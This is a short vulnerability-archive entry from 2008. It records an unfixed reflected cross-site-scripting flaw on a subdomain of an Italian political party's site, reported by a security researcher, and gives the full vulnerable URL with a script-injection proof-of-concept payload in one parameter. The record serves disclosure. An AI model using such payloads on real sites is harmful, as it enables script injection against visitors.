Unfixed XSS vulnerability at italiadeivalori.antoniodipietro.com

2008-09-06T00:00:00
ID XSSED:41502
Type xssed
Reporter Hanno Boeck
Modified 2008-09-07T00:00:00

Description

Security researcher Hanno Boeck, has submitted on 09/06/2008 a cross-site-scripting (XSS) vulnerability affecting italiadeivalori.antoniodipietro.com, which at the time of submission ranked 38252 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://italiadeivalori.antoniodipietro.com/iosostengo/inviomailgen.php?tuonome=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&text=Aiutami+a+diffondere+il+video+del+discorso+di+Antonio+Di+Pietro+alla+Camera+dei+Deputati.+Leggi+il+testo+della+dichiarazione+di+voto+dell%E2%80%99Italia+dei+Valori+per+la+fiducia+al+Governo%2C+fiducia+che+non+%C3%A8+stata+data.+Il+discorso+ha+reso+palese+un+fatto+importante%3A+esiste+un%E2%80%99unica+opposizione%2C+quella+dell%E2%80%99Italia+dei+Valori.&tuamail=s&mail1=s&mail2=&mail3=